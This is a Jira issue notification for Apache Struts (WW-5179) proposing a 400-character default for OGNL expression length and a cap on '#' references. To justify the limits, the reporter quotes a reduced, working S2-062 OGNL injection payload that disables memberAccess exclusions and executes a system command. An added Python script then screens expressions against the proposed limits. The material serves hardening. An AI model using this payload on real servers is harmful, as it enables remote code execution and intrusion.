[
https://issues.apache.org/jira/browse/WW-5179?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
tanli updated WW-5179:
----------------------
Description:
struts.ognl.expressionMaxLength
default set to 400
I reduced the S2-062 exploit:
%{(#request.a=#@org.apache.commons.collections.BeanMap@{})+
(#request.a.setBean(#request.get('struts.valueStack'))==true)+
(#request.b=#@org.apache.commons.collections.BeanMap@{})+
(#request.b.setBean(#request.get('a').get('context'))==true)+
(#request.c=#@org.apache.commons.collections.BeanMap@{})+
(#request.c.setBean(#request.get('b').get('memberAccess'))==true)+
(#request.get('c').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet())==true)+
(#request.get('c').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet())==true)+
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'calc'}))}
Its length is 709, so setting the default OGNL expression length to 400 could keep our app safe.
And!
I think Struts could provide a default number: a limit on how many '#' an expression can have.
Thanks
> struts.ognl.expressionMaxLength default set 400
> -----------------------------------------------
>
> Key: WW-5179
> URL: https://issues.apache.org/jira/browse/WW-5179
> Project: Struts 2
> Issue Type: Improvement
> Components: Core
> Affects Versions: 2.6
> Reporter: tanli
> Priority: Major
>
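The two limits the reporter proposes, mirrored in a stand-alone pre-screen. This is an added example, not Struts code and not the reporter's: it takes the reduced S2-062 payload from the issue (joined into the single string a request parameter would carry) and a constructed benign expression, applies the proposed 400-character cap that struts.ognl.expressionMaxLength would enforce and a hypothetical cap on the number of '#' references (Struts has no such setting; the threshold is an assumption chosen for illustration), and reports which rule rejects each expression.

```python
"""Pre-screen of OGNL expressions against the two limits proposed in WW-5179.

Added example, not Struts code: it mirrors the proposed rules in plain Python
so the numbers behind the proposal can be checked offline. The hash-count
limit is the reporter's idea; Struts has no such setting, so the value used
here is a hypothetical one chosen for illustration.
"""

# Constructed input: the reduced S2-062 payload quoted in the issue, joined
# into the single string a request parameter would actually carry.
S2_062_PAYLOAD = (
    "%{(#request.a=#@org.apache.commons.collections.BeanMap@{})+"
    "(#request.a.setBean(#request.get('struts.valueStack'))==true)+"
    "(#request.b=#@org.apache.commons.collections.BeanMap@{})+"
    "(#request.b.setBean(#request.get('a').get('context'))==true)+"
    "(#request.c=#@org.apache.commons.collections.BeanMap@{})+"
    "(#request.c.setBean(#request.get('b').get('memberAccess'))==true)+"
    "(#request.get('c').put('excludedPackageNames',"
    "#@org.apache.commons.collections.BeanMap@{}.keySet())==true)+"
    "(#request.get('c').put('excludedClasses',"
    "#@org.apache.commons.collections.BeanMap@{}.keySet())==true)+"
    "(#application.get('org.apache.tomcat.InstanceManager')"
    ".newInstance('freemarker.template.utility.Execute').exec({'calc'}))}"
)

# Constructed input: a legitimate-looking expression of the kind an
# application would evaluate on purpose.
BENIGN_EXPRESSION = "%{#session.user.name}"

# Value the issue proposes as the default for struts.ognl.expressionMaxLength.
PROPOSED_MAX_LENGTH = 400

# Hypothetical threshold for the proposed '#' limit (assumption, not a Struts
# setting): every '#' introduces a context or static reference, and the
# payload above needs many of them to reach memberAccess.
HYPOTHETICAL_MAX_HASHES = 4


def count_hash_references(expression):
    """Number of '#' characters, i.e. #var, #@Type@ and #{...} references."""
    return expression.count("#")


def screen(expression, max_length=PROPOSED_MAX_LENGTH,
           max_hashes=HYPOTHETICAL_MAX_HASHES):
    """Return the reasons an expression would be rejected; [] means allowed."""
    reasons = []
    if len(expression) > max_length:
        reasons.append("length %d exceeds %d" % (len(expression), max_length))
    hashes = count_hash_references(expression)
    if hashes > max_hashes:
        reasons.append("%d '#' references exceed %d" % (hashes, max_hashes))
    return reasons


if __name__ == "__main__":
    for label, expr in (("benign", BENIGN_EXPRESSION),
                        ("S2-062 reduced", S2_062_PAYLOAD)):
        verdict = screen(expr) or ["allowed"]
        print("%-15s len=%3d hashes=%2d -> %s"
              % (label, len(expr), count_hash_references(expr),
                 "; ".join(verdict)))
```

Running it shows the reduced payload is well over the 400-character cap and carries 17 '#' references, while the benign expression passes both checks. The real control on a Struts deployment is the struts.ognl.expressionMaxLength constant itself; this script only makes the arithmetic behind the proposal visible.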
--
This message was sent by Atlassian Jira
(v8.20.7#820007)